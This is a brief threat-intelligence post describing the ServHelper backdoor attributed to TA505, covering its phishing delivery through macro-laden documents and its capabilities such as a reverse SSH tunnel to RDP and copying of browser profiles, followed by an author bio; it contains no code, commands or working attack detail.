ServHelper Backdoor
ServHelper is a newly observed Delphi-based backdoor believed to have been created by the TA505 advanced persistent threat group. It appears to be in active development, with new variants published every few days.
It is delivered via malicious macros distributed in DOC, PUB, PDF and WIZ files in phishing campaigns. When opened, these will download and install ServHelper. Some variants will use links to file-hosting platforms in place of macros.
Once installed, will connect to a command and control server before awaiting further commands. Newer variants will also attempt to establish an SSH tunnel through port 3389 and can monitor web browser profiles on affected devices.
The malware posses multiple different features, such as:
- maintains the keep-alive type of functionality;
- connects the C&C to the host’s RDP port (3389) with the help of reverse SSH tunnel;
- copies Firefox and Chrome web browser profiles;
- runs an executable downloaded from a specific URL;
- removes the malware payload;
- many other commands.
Duncan is a technology professional with over 20 years experience of working in various IT roles. He has a interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.